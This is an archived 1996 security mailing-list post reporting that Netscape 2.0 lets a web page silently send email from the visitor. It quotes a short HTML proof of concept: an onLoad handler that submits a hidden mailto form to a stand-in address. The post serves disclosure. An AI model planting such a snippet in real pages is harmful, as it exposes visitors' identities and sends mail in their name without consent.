[prev in list] [next in list] [prev in thread] [next in thread] 

List:       best-of-security
Subject:    BoS: Netscape2.0 sends mail to the world without authority
From:       Julian Assange <proff () suburbia ! net>
Date:       1996-03-12 3:05:23
[Download RAW message or body]

Date: Mon, 11 Mar 1996 13:41:04 -0500
From: Jon Reeves <reeves@zk3.dec.com>
Subject: Yet another Trojan horse lurking in Netscape 2.0...

I noticed, while loading a web page, that there was a mailto: URL active
(using the "Easter Egg" Ctrl-Alt-T popup to see active URLs).  Sure enough,
after I cancelled that and examined the source, I saw something like this:

<body onLoad="document.mailme.submit()">
<form method=post name="mailme" action="mailto:nasty@secret.org?subject=gotcha">
<input type=hidden name="hi" value="there">
</form>

A quick test on my local machine shows that this will send a message to
nasty@secret.org with the subject gotcha and the body "hi=there".

This is insidious; it means that E-mail messages, purportedly from me (and
all traces will show they really are from me) can be sent anywhere, without
my knowledge, with contents that I do not approve.  Further, it means that I
can no longer count on browsing a site without my userid being disclosed.
Unlike Java, there is no way to disable this.  [Also been submitted to
Netscape.]

[prev in list] [next in list] [prev in thread] [next in thread]